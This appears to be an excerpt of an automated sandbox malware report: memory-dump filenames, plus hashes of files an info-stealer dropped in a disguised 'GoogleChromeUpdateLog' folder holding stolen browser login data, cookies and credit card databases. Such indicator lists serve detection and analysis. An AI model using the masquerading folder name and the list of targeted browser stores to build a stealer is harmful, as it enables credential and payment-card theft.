memory/6504-2630-0x000002ABA7EF0000-0x000002ABA7F5A000-memory.dmp

memory/6504-2673-0x000002ABA81E0000-0x000002ABA821A000-memory.dmp

memory/6504-2674-0x000002ABA81A0000-0x000002ABA81C6000-memory.dmp

memory/6504-2681-0x000002ABA8220000-0x000002ABA82D2000-memory.dmp

memory/6504-2703-0x000002ABA8F70000-0x000002ABA929E000-memory.dmp

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\downloads_db

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

memory/6504-2729-0x000002ABA92A0000-0x000002ABA92B2000-memory.dmp

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\credit_cards_db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\downloads_db

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\login_data_db

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\credit_cards_db

MD5 a1eeb9d95adbb08fa316226b55e4f278
SHA1 b36e8529ac3f2907750b4fea7037b147fe1061a6
SHA256 2281f98b872ab5ad2d83a055f3802cbac4839f96584d27ea1fc3060428760ba7
SHA512 f26de5333cf4eaa19deb836db18a4303a8897bf88bf98bb78c6a6800badbaa7ab6aeb6444bbbe0e972a5332670bdbb474565da351f3b912449917be21af0afb8

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\cookies_db

MD5 17141355c3716c4dbbdf5d4e61c3a8ef
SHA1 8f90ca8eb5296ff1564d8dc6b6a693e977d998d4
SHA256 86410035eef0cfc78737f7b84a8d287dbca5667aadeabf2e2f9d65c82b7bb604
SHA512 eae25322290fc6325dce38f841cbf86ec7beba242111d8317c1748ea363007451b78fcaff5b7682043e0c751c58d60378ee5a604db2821a465a3b56d788a4cd6

memory/2468-2807-0x00000225748C0000-0x00000225748DC000-memory.dmp

memory/2468-2811-0x00000225748E0000-0x0000022574995000-memory.dmp

memory/2468-2828-0x00000225748B0000-0x00000225748BA000-memory.dmp

memory/2468-2840-0x0000022574B00000-0x0000022574B1C000-memory.dmp

memory/6632-2875-0x00000000008E0000-0x0000000000C72000-memory.dmp

memory/2468-2891-0x0000022574AE0000-0x0000022574AEA000-memory.dmp

memory/2468-2895-0x0000022574B40000-0x0000022574B5A000-memory.dmp

memory/2468-2896-0x0000022574AF0000-0x0000022574AF8000-memory.dmp

memory/2468-2897-0x0000022574B20000-0x0000022574B26000-memory.dmp

memory/2468-2898-0x0000022574B30000-0x0000022574B3A000-memory.dmp

memory/2428-3171-0x00007FFCAE620000-0x00007FFCAE643000-memory.dmp

memory/2428-3170-0x00007FFCB5C50000-0x00007FFCB5C5F000-memory.dmp

memory/2428-3179-0x00007FFCA5200000-0x00007FFCA5233000-memory.dmp

memory/2428-3178-0x00007FFCB1B50000-0x00007FFCB1B5D000-memory.dmp

memory/2428-3177-0x00007FFCAE600000-0x00007FFCAE619000-memory.dmp

memory/2428-3184-0x00007FFC9EF10000-0x00007FFC9F02C000-memory.dmp

memory/2428-3183-0x00007FFCAE820000-0x00007FFCAE82D000-memory.dmp

memory/2428-3182-0x00007FFCADC50000-0x00007FFCADC64000-memory.dmp

memory/2428-3181-0x00007FFC9EDE0000-0x00007FFC9EEAD000-memory.dmp

memory/2428-3180-0x00007FFC9D610000-0x00007FFC9DB32000-memory.dmp

memory/2428-3176-0x00007FFC9F0F0000-0x00007FFC9F267000-memory.dmp

memory/2428-3175-0x00007FFCA7600000-0x00007FFCA7623000-memory.dmp

memory/2428-3174-0x00007FFCAE650000-0x00007FFCAE669000-memory.dmp

memory/2428-3173-0x00007FFCA9810000-0x00007FFCA983D000-memory.dmp

memory/2428-3172-0x00007FFC9DB40000-0x00007FFC9E129000-memory.dmp